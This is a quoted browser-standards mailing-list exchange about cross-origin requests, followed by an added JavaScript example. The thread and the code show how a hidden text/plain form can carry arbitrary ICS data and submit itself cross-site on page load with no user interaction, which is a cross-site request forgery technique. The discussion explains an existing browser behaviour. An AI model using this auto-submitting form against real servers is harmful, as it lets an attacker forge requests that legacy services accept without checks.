On 8/3/11 5:03 AM, Philippe De Ryck wrote:
You can create pretty much any arbitrary message body you want using
application/x-www-form-urlencoded already by crafting smart names and
values so the real importance is in not being able to set Content-Type.
This is not a security problem as far as I can tell.
Using a form still results in the use of = and & in the body, even with crafted
names/values. Taking the ICS format as an example, this is very difficult to encode
in a normal form, but very easy with cross-origin XHR. This can leave legacy
servers open to a new attack vector.
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
BEGIN:VEVENT
UID:[email protected]
DTSTAMP:19970714T170000Z
ORGANIZER;CN=John Doe:MAILTO:[email protected]
DTSTART:19970714T170000Z
DTEND:19970715T035959Z
SUMMARY:Bastille Day Party
END:VEVENT
END:VCALENDAR
Trivial encoding of the above data in a normal form:
<!DOCTYPE html>
<form
action="put_your_echo_script_here_to_see_what_the_POST_data_looks_like"
method="POST"
enctype="text/plain">
<input type="hidden"
name="BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
BEGIN:VEVENT
UID:[email protected]
DTSTAMP:19970714T170000Z
ORGANIZER;CN"
value="John Doe:MAILTO:[email protected]
DTSTART:19970714T170000Z
DTEND:19970715T035959Z
SUMMARY:Bastille Day Party
END:VEVENT
END:VCALENDAR
">
<input type="submit" value="Send me some ICS!">
</form>
This can be done cross-site by browsers right this second. The submit
can be fully scripted, so doesn't even need user interaction. Just
loading a page with such a form can send your nice ICS data to any HTTP
server that the UA is willing to reach.
-Boris
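The following is an added example, not code from either message above, that scripts the same trick Boris describes: it takes a desired body, splits it at its first "=" into a single hidden control, builds the enctype="text/plain" form, and submits it with no user interaction. The body encoding mirrors what browsers emit for text/plain forms (each control becomes name, "=", value, CRLF, with bare CR or LF in names and values normalised to CRLF), so the function can also show the resulting body offline. The target URL and the e-mail addresses in the sample ICS are constructed placeholders; the form is only created and submitted when a DOM is passed in.

```javascript
// Added example (not from the thread): reproduce the text/plain form trick
// programmatically and show the body the browser will send.
// text/plain encoding per the HTML spec: for each control, name "=" value CRLF,
// after normalising bare CR / LF in names and values to CRLF.

// Constructed sample payload, patterned on the ICS in the thread (LF line ends;
// addresses are placeholders, not real identifiers).
const ICS_PAYLOAD = [
  "BEGIN:VCALENDAR",
  "VERSION:2.0",
  "PRODID:-//hacksw/handcal//NONSGML v1.0//EN",
  "BEGIN:VEVENT",
  "UID:uid1@example.invalid",
  "DTSTAMP:19970714T170000Z",
  "ORGANIZER;CN=John Doe:MAILTO:john.doe@example.invalid",
  "DTSTART:19970714T170000Z",
  "DTEND:19970715T035959Z",
  "SUMMARY:Bastille Day Party",
  "END:VEVENT",
  "END:VCALENDAR",
].join("\n");

// Every text/plain control contributes exactly one "=", so the payload's first
// "=" is used as the name/value boundary. A payload without any "=" cannot be
// sent this way at all; that is the one constraint the enctype imposes.
function splitIntoControl(payload) {
  const i = payload.indexOf("=");
  if (i < 0) {
    throw new Error("text/plain enctype always emits name=value; payload needs at least one '='");
  }
  return { name: payload.slice(0, i), value: payload.slice(i + 1) };
}

// Browsers normalise line breaks in submitted names and values to CRLF.
function normaliseNewlines(s) {
  return s.replace(/\r\n|\r|\n/g, "\r\n");
}

// The exact request body for enctype="text/plain" with the given controls.
function encodeTextPlain(controls) {
  return controls
    .map(({ name, value }) => normaliseNewlines(name) + "=" + normaliseNewlines(value) + "\r\n")
    .join("");
}

// Build the form and, when a DOM is available, submit it cross-site without
// any user interaction. Always returns the controls and the computed body so
// the result can be inspected (or asserted on) without a browser.
function submitAsTextPlain(action, payload, doc) {
  const control = splitIntoControl(payload);
  const controls = [control];
  if (doc) {
    const form = doc.createElement("form");
    form.method = "POST";
    form.action = action;
    form.enctype = "text/plain";
    const input = doc.createElement("input");
    input.type = "hidden";
    input.name = control.name;
    input.value = control.value;
    form.appendChild(input);
    doc.body.appendChild(form);
    form.submit(); // no click needed; fires on page load
  }
  return { controls, body: encodeTextPlain(controls) };
}

// Stand-alone run: in a browser, pass `document`; in Node, pass null.
const hasDom = typeof document !== "undefined";
const result = submitAsTextPlain("https://target.example/calendar", ICS_PAYLOAD, hasDom ? document : null);
if (!hasDom) {
  console.log(JSON.stringify(result.body));
}
```

Note that the body contains no "&" and only the one "=" the ICS data already had; the trailing CRLF appended after the last control is the only byte the target sees that was not in the payload, and the CRLF normalisation happens to match what ICS requires anyway.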